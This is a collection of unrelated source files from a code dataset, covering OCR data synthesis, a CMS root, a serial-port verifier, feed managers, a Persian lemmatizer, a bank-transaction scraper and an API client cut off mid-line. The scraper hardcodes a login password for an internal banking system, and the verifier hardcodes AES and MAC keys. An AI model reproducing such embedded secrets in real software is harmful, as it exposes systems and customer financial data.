(https://gitlab2.kabang.io/bigdata/ocr/tree/master/preprocessing/phd08_to_tfrecord)\n 4) Run 'phd08_to_image.py' to convert txt files to image files => Output: phd08_out\n 5) Configure parameters of 'synthetic_text_image.py'\n 6) Run 'synthetic_text_image.py'\n'''\n\n# paramters\n# ---------------------------------------------------------------\n# character image files\nSOURCE_CHAR_DIR = \"/Users/asher/dev/workspace/exercise/phd08_to_tfrecord/phd08_out\"\nSOURCE_CHAR_FORMAT = '.jpeg'\n\n# background image files\nSOURCE_BG_DIR = \"/Users/asher/dev/workspace/exercise/cv/background\"\nSOURCE_BG_FORMAT = '.jpg'\n\n# target path/format\nTARGET_ROOT_DIR = \"synth_out\"\nTARGET_IMG_DIR = TARGET_ROOT_DIR + \"/images\"\nTARGET_ANNO_DIR = TARGET_ROOT_DIR + \"/annotation\"\nTARGET_FILE_FORMAT = '.jpg'\n\n# the number of output (synthetic images)\nNUMBER_OF_IMAGES = 100000\n\n# shuffle\nRANDOM_SEED = 12345\n\n# the range of the number of characters on each background image: (a, b) means a <= N <= b\nNUM_OF_CHARS_RANGE = (6, 10)\n\n# the range of font sizes: (a, b) means a <= N <= b\nFONT_SIZE_RANGE = (32, 64)\n\n# character patch threshold: larger 'a' means more vivid character images (a: 0~255)\nCHARS_THRESH = 127\n\n# splitting train/validation/test set (unit: %)\nTRAIN_SET = 98\nVALID_SET = 1\nTEST_SET = 1\n\n# display a synthesized image per 'N' numbers of samples\nDISPLAY_SAMPLE_PER_N = 1000\n# ---------------------------------------------------------------\n\n# if the target directory (for output) already exists, remove it\ntry:\n shutil.rmtree(TARGET_ROOT_DIR)\n shutil.rmtree(TARGET_IMG_DIR)\n shutil.rmtree(TARGET_ANNO_DIR)\nexcept OSError:\n pass\n\n# make a new target directory\nos.mkdir(TARGET_ROOT_DIR)\nos.mkdir(TARGET_IMG_DIR)\nos.mkdir(TARGET_ANNO_DIR)\n\n\ndef findImages(root_dir,\n file_format='.jpg'):\n filenames = []\n\n for (path, dirs, files) in os.walk(root_dir):\n fullpath = os.path.join(root_dir, path)\n for file in files:\n # get extension format of a file\n ext = os.path.splitext(file)[-1]\n if ext == file_format:\n filenames.append(os.path.join(fullpath, file))\n\n print(\"Found '{}' '{}' image files from the path: '{}'\\n\"\n .format(len(filenames), file_format, root_dir))\n\n return filenames\n\n\ndef shuffleFileLists(filenames,\n random_seed=RANDOM_SEED):\n shuffled_index = list(range(len(filenames)))\n random.seed(random_seed)\n random.shuffle(shuffled_index)\n shuffled_filenames = [filenames[i] for i in shuffled_index]\n\n return shuffled_filenames\n\n\ndef drawNonOverlappingImages(bg_file,\n char_files,\n num_of_chars_range=NUM_OF_CHARS_RANGE,\n font_size_range=FONT_SIZE_RANGE):\n def isOverlapped(prev_img, curr_img):\n # Input: (x, y, width, height)\n prev_center = (prev_img[0] + prev_img[2] / 2, prev_img[1] + prev_img[3] / 2)\n curr_center = (curr_img[0] + curr_img[2] / 2, curr_img[1] + curr_img[3] / 2)\n\n condition = (abs(prev_center[0] - curr_center[0]) > (prev_img[2] + curr_img[2]) / 2) | \\\n (abs(prev_center[1] - curr_center[1]) > (prev_img[3] + curr_img[3]) / 2)\n\n return not condition\n\n def patchImage(bg_img, char_img, pos_x, pos_y, font_size):\n\n char_img = cv2.resize(char_img, (font_size, font_size))\n roi = bg_img[pos_y:pos_y + font_size, pos_x:pos_x + font_size]\n\n char_img_gray = cv2.cvtColor(char_img, cv2.COLOR_BGR2GRAY)\n ret, mask = cv2.threshold(char_img_gray, CHARS_THRESH, 255, cv2.THRESH_BINARY_INV)\n mask_inv = cv2.bitwise_not(mask)\n\n bg_img_out = cv2.bitwise_and(roi, roi, mask=mask_inv)\n char_img_roi = cv2.bitwise_and(char_img, char_img, 
mask=mask)\n\n dst = cv2.add(bg_img_out, char_img_roi)\n bg_img[pos_y:pos_y + font_size, pos_x:pos_x + font_size] = dst\n\n return bg_img\n\n # read a background image file\n bg_img = cv2.imread(bg_file)\n bg_height, bg_width, bg_chn = bg_img.shape\n\n prev_images = [(0, 0, 0, 0)]\n\n for file in char_files:\n\n found_new_pos = False\n\n while not found_new_pos:\n font_size = random.randint(font_size_range[0], font_size_range[1])\n\n x = random.randint(0, bg_width - font_size)\n y = random.randint(0, bg_height - font_size)\n\n is_overlapped = [isOverlapped(prev_img, (x, y, font_size, font_size)) for prev_img in prev_images]\n\n if not any(is_overlapped):\n found_new_pos = True\n prev_images.append((x, y, font_size, font_size))\n\n # bg_img = cv2.rectangle(bg_img, (x, y), (x+font_size, y+font_size), (0,255,0), 3)\n char_img = cv2.imread(file)\n bg_img = patchImage(bg_img, char_img, x, y, font_size)\n\n return bg_img, prev_images[1:]\n\n\ndef makeXML(file_path, bg_img, char_names, char_info=(0, 0, 0, 0)):\n # char_info: (x, y, font_size, font_size)\n\n def indent(elem, level=0):\n i = \"\\n\" + level * \" \"\n if len(elem):\n if not elem.text or not elem.text.strip():\n elem.text = i + \" \"\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n for elem in elem:\n indent(elem, level + 1)\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n else:\n if level and (not elem.tail or not elem.tail.strip()):\n elem.tail = i\n\n bg_height, bg_width, bg_chn = bg_img.shape\n\n annotation = Element(\"annotation\")\n SubElement(annotation, \"folder\").text = TARGET_ROOT_DIR\n SubElement(annotation, \"filename\").text = str(file_path.split('/')[-1])\n size = Element(\"size\")\n annotation.append(size)\n SubElement(size, \"width\").text = str(bg_width)\n SubElement(size, \"height\").text = str(bg_height)\n SubElement(size, \"depth\").text = '3'\n\n for i, char in enumerate(char_names):\n obj = Element(\"object\")\n annotation.append(obj)\n SubElement(obj, \"name\").text = char\n bndbox = Element(\"bndbox\")\n obj.append(bndbox)\n\n x, y, width, height = char_info[i]\n\n SubElement(bndbox, \"xmin\").text = str(x)\n SubElement(bndbox, \"ymin\").text = str(y)\n SubElement(bndbox, \"xmax\").text = str(x + width)\n SubElement(bndbox, \"ymax\").text = str(y + height)\n\n indent(annotation)\n # dump(annotation)\n file_name = file_path.split('/')[-1].split('.')[0]\n ElementTree(annotation).write(os.path.join(TARGET_ANNO_DIR, file_name + '.xml'), encoding='utf-8')\n\n\n# list up & shuffle character image files\nchar_filenames = findImages(root_dir=SOURCE_CHAR_DIR, file_format=SOURCE_CHAR_FORMAT)\n\nshuffled_char_filenames = shuffleFileLists(char_filenames)\n\n# list up background image files\nbg_filenames = findImages(root_dir=SOURCE_BG_DIR, file_format=SOURCE_BG_FORMAT)\n\nshuffled_bg_filenames = shuffleFileLists(bg_filenames)\n\n# list up how to distribute char images on background images\nchar_distribute_plan = []\n\nfor _ in range(NUMBER_OF_IMAGES):\n random_number = random.randint(NUM_OF_CHARS_RANGE[0], NUM_OF_CHARS_RANGE[1])\n char_distribute_plan.append(random_number)\n\n# patch character images on background images according to the plan\nnum_chars = len(shuffled_char_filenames)\nnum_bgs = len(shuffled_bg_filenames)\n\nchar_idx = 0\nbg_idx = 0\nfor i, num_of_images in enumerate(char_distribute_plan):\n synth_img, char_info = drawNonOverlappingImages(\n shuffled_bg_filenames[bg_idx],\n shuffled_char_filenames[char_idx:char_idx + num_of_images])\n\n # save a synthetic image\n file_path = 
os.path.join(TARGET_IMG_DIR, str(i) + TARGET_FILE_FORMAT)\n cv2.imwrite(file_path, synth_img)\n\n # Save a xml file\n char_names = [filename.split('/')[-2]\n for filename\n in shuffled_char_filenames[char_idx:char_idx + num_of_images]]\n\n makeXML(file_path, synth_img, char_names, char_info)\n\n char_idx = (char_idx + num_of_images) % num_chars\n bg_idx = i % num_bgs\n\n if not (i % DISPLAY_SAMPLE_PER_N):\n print(\"Synthetic image output: # {}\".format(i))\n plt.imshow(synth_img)\n plt.show()\n\n# split train/val/test set\nshuffled_index = list(range(NUMBER_OF_IMAGES))\nrandom.seed(RANDOM_SEED)\nrandom.shuffle(shuffled_index)\n\nnum_train = int(NUMBER_OF_IMAGES * TRAIN_SET / (TRAIN_SET + VALID_SET + TEST_SET))\nnum_valid = int(NUMBER_OF_IMAGES * VALID_SET / (TRAIN_SET + VALID_SET + TEST_SET))\nnum_test = NUMBER_OF_IMAGES - num_train - num_valid\n\nwith open(TARGET_ROOT_DIR + \"/train.txt\", \"w\") as wf:\n for index in shuffled_index[0:num_train]:\n wf.write(str(index) + '\\n')\n\nwith open(TARGET_ROOT_DIR + \"/val.txt\", \"w\") as wf:\n for index in shuffled_index[num_train:num_train + num_valid]:\n wf.write(str(index) + '\\n')\n\nwith open(TARGET_ROOT_DIR + \"/trainval.txt\", \"w\") as wf:\n for index in shuffled_index[0:num_train + num_valid]:\n wf.write(str(index) + '\\n')\n\nwith open(TARGET_ROOT_DIR + \"/test.txt\", \"w\") as wf:\n for index in shuffled_index[num_train + num_valid:]:\n wf.write(str(index) + '\\n')\n\nwith open(TARGET_ROOT_DIR + \"/labels.txt\", \"w\") as wf:\n for label in os.listdir(SOURCE_CHAR_DIR):\n wf.write(str(label) + '\\n')\n\nprint(\"Train / Valid / Test : {} / {} / {}\".format(num_train, num_valid, num_test))\nprint(\"Output path: {}\".format(TARGET_ROOT_DIR))\nprint(\"Made {} synthetic images.\".format(NUMBER_OF_IMAGES))","sub_path":"tools/phd08_synth_image.py","file_name":"phd08_synth_image.py","file_ext":"py","file_size_in_byte":10287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"210822567","text":"##### Background #####\n# We add a Leap Day on February 29, almost every four years. The leap day is an extra, or intercalary, day and we add it to the shortest month of the year, February. In the Gregorian calendar three criteria must be taken into account to identify leap years:\n## The year can be evenly divided by 4, unless the year can evenly be divided by 100 and not evenly divisible by 400.\n\n##### Task #####\n# You are given the year, and you have to write a function to check if the year is leap or not\n# Note that you have to complete the function and remaining code is given as a template\n\n##### Input Format #####\n# Ready y, the year that needs to be checked\n\n##### Constraints #####\n# 1900 <= y <= 10^5\n\n##### Output Format #####\n# Output is taken care of by the template. 
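For example, is_leap(2000) should return True (2000 is divisible by 400), while is_leap(1900) should return False (divisible by 100 but not by 400). 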
Your function must return a boolean value.\n\ndef is_leap(year):\n\n if( year % 4 != 0 ):\n return False\n elif( year % 100 != 0 ):\n return True\n elif( year % 400 != 0 ):\n return False\n else:\n return True\n \n\nif __name__ == \"__main__\":\n year = int( input() )\n print( is_leap(year) )\n\n##### Sample Input #####\n# 1990\n##### Expected Output #####\n# False","sub_path":"Introduction/writeafunction.py","file_name":"writeafunction.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"27195834","text":"\"\"\" Aplication Root \"\"\"\nimport sqlalchemy as sqla\nimport ptah\nfrom ptah import config\nfrom zope import interface\n\nfrom node import Node, Session, set_policy\nfrom container import Container\nfrom interfaces import IApplicationRoot, IApplicationPolicy\n\n\nAPPFACTORY_ID = 'ptah.cms:appfactory'\n\ndef get_app_factories():\n return config.get_cfg_storage(APPFACTORY_ID)\n\n\nclass ApplicationRoot(Container):\n interface.implements(IApplicationRoot)\n\n __root_path__ = '/'\n\n def __resource_url__(self, request, info):\n return self.__root_path__\n\n\nclass ApplicationPolicy(object):\n interface.implements(IApplicationPolicy)\n\n __name__ = ''\n __parent__ = None\n\n # default acl\n __acl__ = ptah.DEFAULT_ACL\n\n def __init__(self, request):\n self.request = request\n\n\nclass ApplicationFactory(object):\n\n def __init__(self, factory, path='', name='', title='',\n policy = ApplicationPolicy, default_root = None, config=None):\n self.id = '-'.join(part for part in path.split('/') if part)\n self.path = path if path.endswith('/') else '%s/'%path\n self.name = name\n self.title = title\n\n self.default_root = default_root\n if not path and default_root is None:\n self.default_root = True\n\n if isinstance(factory, type) and issubclass(factory, Node):\n factory = factory.__type__\n\n self.factory = factory\n self.policy = policy\n\n if config is not None:\n ptah.config.get_cfg_storage(\n APPFACTORY_ID, registry=config.registry)[self.id] = self\n\n info = ptah.config.DirectiveInfo()\n info.attach(\n ptah.config.Action(\n lambda cfg: cfg.get_cfg_storage(APPFACTORY_ID)\\\n .update({self.id:self}),\n discriminator=(APPFACTORY_ID, path))\n )\n\n _sql_get_root = ptah.QueryFreezer(\n lambda: Session.query(Container)\\\n .filter(sqla.sql.and_(\n Container.__name_id__ == sqla.sql.bindparam('name'),\n Container.__type_id__ == sqla.sql.bindparam('type'))))\n\n def __call__(self, request=None):\n root = self._sql_get_root.first(\n name=self.name, type=self.factory.__uri__)\n if root is None:\n root = self.factory.create(title=self.title)\n root.__name_id__ = self.name\n root.__path__ = '/%s/'%root.__uri__\n Session.add(root)\n Session.flush()\n\n root.__root_path__ = self.path\n root.__parent__ = policy = self.policy(request)\n root.__default_root__ = self.default_root\n\n set_policy(policy)\n\n if request is not None:\n request.root = root\n return root\n","sub_path":"ptah/cms/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"406419693","text":"#!/usr/bin/env python3\nimport binascii\nimport hashlib\nimport hmac\nimport os\nimport sys\nfrom time import sleep, time\nfrom termcolor import colored\n\nimport serial\n\nsys.path += [ os.path.join(os.path.split(__file__)[0], '../libs/python') ]\n\nfrom aes import AESCipher, unpad\nfrom intelhex import IntelHex\nfrom listPorts 
import getPorts\n\nAES_NONCE_LENGTH = 16\nMAC_LENGTH = 20\nAES_KEY = bytes([0x39, 0x79, 0x24, 0x42, 0x26, 0x45, 0x29, 0x48, 0x40, 0x4D, 0x63, 0x51, 0x66, 0x54, 0x6A, 0x57])\nMAC_KEY = bytes([0x93, 0x79, 0x24, 0x42, 0x26, 0x45, 0x29, 0x48, 0x40, 0x4D, 0x63, 0x51, 0x66, 0x54, 0x6A, 0x57, 0xff, 0xff, 0xff, 0xff])\n\ndef read_message(ser: serial.Serial) -> dict:\n # Message structure\n #+---------+-----------+------------+----------+--------+\n #| Timer | AES nonce | HMAC nonce | MAC | Data |\n #+---------+-----------+------------+----------+--------+\n #| 2 bytes | 16 bytes | 20 bytes | 20 bytes | 1 byte |\n #+---------+-----------+------------+----------+--------+\n # The HMAC nonce, MAC and data are encrypted with AES in CBC mode\n msg_length = int.from_bytes(ser.read(2), byteorder='big')\n msg_components = dict()\n msg_components['timer'] = int.from_bytes(ser.read(2), byteorder='big')\n aes_nonce = ser.read(16)\n encrypted_part = ser.read(msg_length - 2 - 16)\n decrypted_part = unpad(AESCipher(AES_KEY).decryptCBC(encrypted_part, aes_nonce))\n msg_components['mac_nonce'] = decrypted_part[:20]\n msg_components['mac'] = decrypted_part[20:40]\n msg_components['data'] = int.from_bytes(decrypted_part[-1:], byteorder='big')\n return msg_components\n\n\ndef main():\n # Check if hexfile exists\n hexfile = \"proof-carrying.hex\"\n if not os.path.isfile(hexfile):\n print(\"ERROR: File not found:\", hexfile)\n sys.exit(2)\n ih = IntelHex(hexfile)\n\n # Setup serial connection\n ports = getPorts()\n if len(ports) == 0:\n print(\"No serial ports found. Please check your USB connection and try again.\")\n sys.exit(1)\n port = ports[0]\n print(f\"No port specified, defaulting to {port}\")\n ser = serial.Serial(port, 9600)\n\n # Restart arduino\n ser.setDTR(False)\n print(\"Resetting Arduino...\")\n sleep(1)\n ser.setDTR(True)\n\n # Read 'Arduino is ready' message\n response_length = int.from_bytes(ser.read(2), byteorder='big')\n print(ser.read(response_length).decode(\"utf8\"))\n # Acknowledge welcome message\n ser.write(b's')\n ser.flush()\n\n while True:\n # Wait for message\n msg = read_message(ser)\n elapsed_time = msg['timer']\n mac_nonce = msg['mac_nonce']\n remote_mac = msg['mac']\n data = msg['data']\n\n # Calc digest\n hmac_gen = hmac.new(MAC_KEY, None, hashlib.sha1)\n hmac_gen.update(ih.tobinstr(0,30*1024-1))\n hmac_gen.update(msg['mac_nonce'])\n local_mac = hmac_gen.digest()\n\n if (remote_mac == local_mac):\n print(colored(f\"✓ Received message has valid proof \", 'green', attrs=[\"bold\"]) + f\"({remote_mac.hex()})\")\n else:\n print(colored(f\"✗ Received message with invalid proof!\", \"red\", attrs=[\"bold\"]))\n print(f\"Measurement: {data}\")\n print(f\"Time to create message: {elapsed_time}ms\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/proof-carrying/verifier.py","file_name":"verifier.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"321168854","text":"from classification.model import VGG_ResNet\nimport config as C\nimport torch\nfrom torchvision.transforms import ToTensor, Compose\n\n\nclass Classifier:\n def __init__(self, checkpoint):\n self.classifier = VGG_ResNet(C.NUM_CLASSES).cuda()\n self.classifier.load_state_dict(\n torch.load(checkpoint)\n )\n\n def predict(self, imgs):\n imgs = torch.Tensor(imgs)/255\n imgs = imgs.cuda()\n self.classifier.eval()\n output = self.classifier.forward(imgs)\n label = torch.argmax(output, 1)\n return 
label.cpu().detach().numpy()\n\n","sub_path":"classification/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"581820020","text":"\"\"\"Feed Manager for NSW Transport Service Incidents feed.\"\"\"\nfrom typing import List, Tuple, Callable, Awaitable\n\nfrom aio_geojson_client.feed_manager import FeedManagerBase\nfrom aio_geojson_client.status_update import StatusUpdate\nfrom aiohttp import ClientSession\n \nfrom .feed import NswTransportServiceIncidentsFeed\n\n\nclass NswTransportServiceIncidentsFeedManager(FeedManagerBase):\n    \"\"\"Feed Manager for NSW Transport Services Incidents feed.\"\"\"\n\n    def __init__(self,\n                 websession: ClientSession,\n                 generate_callback: Callable[[str], Awaitable[None]],\n                 update_callback: Callable[[str], Awaitable[None]],\n                 remove_callback: Callable[[str], Awaitable[None]],\n                 coordinates: Tuple[float, float],\n                 filter_radius: float = None,\n                 filter_categories: List[str] = None,\n                 hazard: str = None,\n                 status_callback: Callable[[StatusUpdate],\n                                           Awaitable[None]] = None):\n        \"\"\"Initialize the NSW Transport Services Feed Manager.\"\"\"\n        feed = NswTransportServiceIncidentsFeed(\n            websession,\n            coordinates,\n            filter_radius=filter_radius,\n            hazard=hazard,\n            filter_categories=filter_categories)\n        super().__init__(feed,\n                         generate_callback,\n                         update_callback,\n                         remove_callback,\n                         status_async_callback=status_callback)\n","sub_path":"aio_geojson_nsw_transport_incidents/feed_manager.py","file_name":"feed_manager.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"309144759","text":"# -*- coding: utf-8 -*-\n\npronouns = [('م', 'مان'), ('ت', 'تان'), ('ش', 'شان')]\nids = [('م', 'یم'), ('ی', 'ید'), ('', 'د', 'ند')]\n# principals = [('خورد', 'خور'), ('رفت', 'رو'), ('نوشت', 'نویس'), ('آمد', 'آی'), ('گرفت', 'گیر'), ('زد', 'زن')]\nprincipals = ['خورد', 'خور', 'رفت', 'رو', 'نوشت', 'نویس', 'آمد', 'آی', 'گرفت', 'گیر', 'زد', 'زن']\n\n\nclass Lemmatizer(object):\n    def __init__(self):\n        pass\n\n    def lemmatize(self, word):\n        for per in ids:\n            for id in per:\n                if word.endswith(id):\n                    rest = word[:-len(id)] if len(id) > 0 else word\n                    tmp = ['ه بود', 'ه باش', 'ه ا', 'ه اس']\n                    for t in tmp:\n                        if rest.endswith(t):\n                            rest = rest[:-len(t)]\n                    tmp = ['می ', 'داشت' + id + ' می ', 'می', 'داشت' + id + ' می', 'ب', 'دار' + id + ' می ', 'دار' + id + ' می']\n                    for t in tmp:\n                        if rest.startswith(t):\n                            rest = rest[len(t):]\n                    if rest in principals:\n                        print(rest)\n                if len(id) > 0 and word.startswith('خواه' + id + ' ') and word[len('خواه' + id + ' '):] in principals:\n                    print(word[len('خواه' + id + ' '):])\n\n\nquery = input('query: ')\nlemmatizer = Lemmatizer()\nlemmatizer.lemmatize(query)\n","sub_path":"func/m_lemmatizer.py","file_name":"m_lemmatizer.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"606536173","text":"import datetime\nimport http.cookiejar\nimport urllib.request\nimport pandas as pd\n\n\ndef get_html():\n\n    # set up\n    date_hyphen = datetime.date.today().isoformat()\n    cj = http.cookiejar.CookieJar()\n\n    # get cookie\n    req = urllib.request.Request(url='http://116.212.0.18:8080/exbadm/loginAction.do?method=goToIndex', method='GET')\n    with urllib.request.urlopen(req) as rsp:\n        cj.extract_cookies(rsp, req)\n\n    # log in\n    body = 
"orgId=304311000000&operId=000003&passwd=111111".encode("latin_1")\n    req = urllib.request.Request(url='http://116.212.0.18:8080/exbadm/loginAction.do?method=login',data=body, method='POST')\n    with urllib.request.urlopen(req) as rsp:\n        cj.extract_cookies(rsp, req)\n\n    # search cddb hddb\n    url_search = "http://116.212.0.18:8080/exbadm/queryAction.do"\n    params_search = "?method=queryTrnjour&startDate=" + date_hyphen + \\n        "&typeFlag=query&endDate=" + date_hyphen + "&transResult=success&dbType=cddb&curpage=1&" + \\n        "pageCount=1000&pagesize=1000"\n    req = urllib.request.Request(url=url_search+params_search, method='GET')\n    cj.add_cookie_header(req)\n    with urllib.request.urlopen(req) as rsp:\n        webpage = rsp.read()  # UTF-8\n    return webpage\n\n\ndef save_file(file, path):\n    with open(path, mode="a") as f:\n        f.write(file)\n\n\ndef distinguish(row):\n    is_maker = row['提出行'] == 304311000016 or row['提出行'] == 304311225954 or \\n               row['提出行'] == 304311525821 or row['提出行'] == 304311026021\n    is_credit = row['借贷'] == '贷'\n    if is_maker == is_credit:\n        row['金额'] *= -1\n    else:\n        row['户名'] = row['收款人户名']\n    return row\n\n\ndef get_sheet(web_page):\n    df = pd.read_html(web_page.decode("utf_8"))[1]\n    df['户名'] = df['付款人户名']\n    df = df.apply(distinguish, axis=1)\n    df = df[['交易日期', '金额', '户名']]\n    df = df.groupby(['交易日期', '户名']).sum()\n    df = df.reset_index().reindex(columns=['交易日期', '金额', '户名'])\n    return df\n\n\ndef filter_sheet(df):\n    return df\n\n\ndef get_csv(df):\n    return df.to_csv(mode="a", header=False, index=None)\n\n\ndef main():\n    html_file = get_html()\n    # save_file(html_file, "C:\\\\Users\\\\Admin\\\\Desktop\\\\当日同城.html")\n    sheet_all = get_sheet(html_file)\n    sheet_large = get_csv(filter_sheet(sheet_all))\n    save_file(sheet_large, "C:\\\\Users\\\\Admin\\\\Desktop\\\\当日大额及同城.csv")\n\n\nif __name__ == '__main__':\n    main()\n\n","sub_path":"data_picking/sub/same_city_current.py","file_name":"same_city_current.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"408750462","text":"BROKER_HOST = \"localhost\"\nBROKER_PORT = 6379\n#BROKER_USER = \"guest\"\n#BROKER_PASSWORD = \"guest\"\nBROKER_VHOST = \"/\"\n\n# Specify the result backend. Redis is used here.\nCELERY_RESULT_BACKEND = \"redis\"\n\n# worker settings\n## Concurrency. Reportedly best kept close to the number of CPUs; if omitted, the number of CPUs/cores is used.\n#CELERYD_CONCURRENCY\n## Log output destination. If omitted, standard error is used.\nCELERYD_LOG_FILE = \"celeryd.log\"\n## Log level\nCELERYD_LOG_LEVEL = \"INFO\" # DEBUG, INFO, WARNING, ERROR or CRITICAL\n\n# Modules to import at startup\nCELERY_IMPORTS = (\"app\",)","sub_path":"web_api/celeryconfig.py","file_name":"celeryconfig.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"416703800","text":"from django import forms\nfrom .models import Reader, Book\n\n\nclass ReaderCreateForm(forms.ModelForm):\n    \"\"\"\n    Form to create an object of the Reader model.\n    \"\"\"\n    class Meta:\n        model = Reader\n        fields = ['first_name', 'last_name']\n\n\nclass BookCreateForm(forms.ModelForm):\n    \"\"\"\n    Form to create or update an object of the Book model.\n    \"\"\"\n\n    class Meta:\n        model = Book\n        fields = ['author', 'name', 'description']\n\n    def process(self, reader_id):\n        \"\"\"\n        Method 'process' creates a Book model object for the current Reader object.\n        :param reader_id: id of current Reader\n        \"\"\"\n        data = self.cleaned_data\n        reader = Reader.objects.filter(id=reader_id)\n        instance = Book.objects.create(**data)\n        
instance.reader.set(reader)\n","sub_path":"library/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"585293356","text":"####\n# Xml file io for OscDrop class\n#===\n# To do:\n# -> add comments\n# -> write tests\n# -> address code repetition in write\n# -> better data storage would help this a lot...\n####\nimport xml.etree.ElementTree as ET\n\nfrom ElementTree_HuRe import prettify\nfrom oscdropbase import OscDropBase as odb\n\n# Reads droplet parameter data from an xml file and returns a dictionary\n# of tag, value pairs\ndef read(infile):\n root_node = ET.parse(infile).getroot()\n defn_node = root_node.find(odb._defn)\n defn_cats = [cat for cat in defn_node.getchildren()]\n defn_prms = [param for cat in defn_cats for param in cat]\n return {prm.tag : prm.get('value') for prm in defn_prms}\n\n# Writes droplet data to an xml file from a dict containing data\ndef write(outdata, outfile):\n root_node = ET.Element('droplet')\n def populate_nodes(parent, params):\n for param in params:\n node = ET.SubElement(parent, param)\n node.attrib['value'] = outdata[param] if param in outdata else odb.float_to_str(0.0)\n defn_node = ET.SubElement(root_node, odb._defn)\n for cat in odb._defn_data.keys():\n cat_node = ET.SubElement(defn_node, cat)\n for param in odb._defn_data[cat]:\n prm_node = ET.SubElement(cat_node, param)\n prm_node.attrib['value'] = outdata[param]\n thry_node = ET.SubElement(root_node, odb._thry)\n xpmt_node = ET.SubElement(root_node, odb._xpmt)\n populate_nodes(thry_node, odb._thry_prms)\n populate_nodes(xpmt_node, odb._xpmt_prms)\n #===\n # Write xml tree to file in a nicely whitespaced xml format\n with open(outfile, 'w') as output:\n output.write(prettify(root_node))\n\n## M. Sullivan. August, 2016\n","sub_path":"oscdrop/oscdrop/oscdropxml.py","file_name":"oscdropxml.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"575078357","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport json\nimport uuid\n\nfrom . import *\nfrom . 
import cm\nfrom requests_kerberos import HTTPKerberosAuth, DISABLED\n\n_SSB_USER = 'admin'\n_SSB_SESSION = None\n_SSB_CSRF_TOKEN = None\n\n_API_INTERNAL = 'internal'\n_API_EXTERNAL = 'external'\n_API_UI = 'ui'\n_FLINK_VERSION = None\n\n\n_CSRF_REGEXPS = [\n r'.*name=\"csrf_token\" type=\"hidden\" value=\"([^\"]*)\"',\n r'.*var *csrf_token *= *\"([^\"]*)\"'\n]\n\n\ndef _get_csrf_token(txt, quiet=True):\n token = None\n for regexp in _CSRF_REGEXPS:\n m = re.match(regexp, txt, flags=re.DOTALL)\n if m:\n token = m.groups()[0]\n break\n else:\n if not quiet:\n raise RuntimeError(\"Cannot find CSRF token.\")\n return token\n\n\ndef _get_ui_port():\n return '8001' if is_tls_enabled() else '8000'\n\n\ndef _get_api_url():\n return '{}://{}:{}/api/v1'.format(get_url_scheme(), get_hostname(), _get_ui_port())\n\n\ndef _get_rest_api_url():\n return '{}://{}:18121/api/v1'.format(get_url_scheme(), get_hostname())\n\n\ndef _get_ui_url():\n return '{}://{}:{}/ui'.format(get_url_scheme(), get_hostname(), _get_ui_port())\n\n\ndef _get_url(api_type):\n if api_type == _API_UI:\n return _get_ui_url()\n elif api_type == _API_INTERNAL:\n return _get_api_url()\n else:\n return _get_rest_api_url()\n\n\ndef _api_call(func, path, data=None, files=None, headers=None, api_type=_API_INTERNAL, token=False):\n global _SSB_CSRF_TOKEN\n if not headers:\n headers = {}\n if api_type != _API_UI:\n headers['Content-Type'] = 'application/json'\n data = json.dumps(data)\n auth = None\n if is_kerberos_enabled():\n auth = HTTPKerberosAuth(mutual_authentication=DISABLED)\n else:\n headers['Username'] = 'admin'\n if token:\n headers['X-CSRF-TOKEN'] = _SSB_CSRF_TOKEN\n url = _get_url(api_type) + path\n resp = func(url, data=data, headers=headers, files=files, auth=auth)\n if resp.status_code != requests.codes.ok:\n raise RuntimeError(\"Call to {} returned status {}. 
\\nData: {}\\nResponse: {}\".format(\n url, resp.status_code, json.dumps(data), resp.text))\n\n token = _get_csrf_token(resp.text)\n if token:\n _SSB_CSRF_TOKEN = token\n return resp\n\n\ndef _api_get(path, data=None, api_type=_API_INTERNAL, token=False):\n return _api_call(_get_session().get, path, data=data, api_type=api_type, token=token)\n\n\ndef _api_post(path, data=None, files=None, headers=None, api_type=_API_INTERNAL, token=False):\n return _api_call(_get_session().post, path, data=data, files=files, headers=headers, api_type=api_type, token=token)\n\n\ndef _api_delete(path, data=None, api_type=_API_INTERNAL, token=False):\n return _api_call(_get_session().delete, path, data=data, api_type=api_type, token=token)\n\n\ndef _get_session():\n global _SSB_SESSION\n if not _SSB_SESSION:\n _SSB_SESSION = requests.Session()\n if is_tls_enabled():\n _SSB_SESSION.verify = get_truststore_path()\n\n _api_get('/login', api_type=_API_UI)\n _api_post('/login', {'next': '', 'login': _SSB_USER, 'password': get_the_pwd()}, api_type=_API_UI, token=True)\n return _SSB_SESSION\n\n\ndef _get_flink_version():\n global _FLINK_VERSION\n if not _FLINK_VERSION:\n _FLINK_VERSION = cm.get_product_version('FLINK')\n return _FLINK_VERSION\n\n\ndef _get_csa_version():\n parcel_version = _get_flink_version()\n version_match = re.match(r'.*csa-?([0-9.]*).*', parcel_version)\n return [int(v) 